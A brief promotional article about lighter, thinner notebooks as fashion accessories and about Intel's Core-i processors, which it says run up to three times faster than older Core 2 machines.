Notebooks are becoming increasingly lighter and thinner, and taking on the role of fashion accessories to project a personal image as well as sophisticated machines for processing data and keeping in touch with friends and colleagues.

Intel's Core-i technology is at the heart of the laptop revolution, with these ultra-fast and ultra-small microprocessors allowing for ever-smaller designs and increased performance. They are fitted into a whole range of electronic devices apart from laptops, from digital signs to automated machines. Fitting them into laptops allows the kit to work anywhere up to three times faster than those using the Core 2 technology of older ranges.........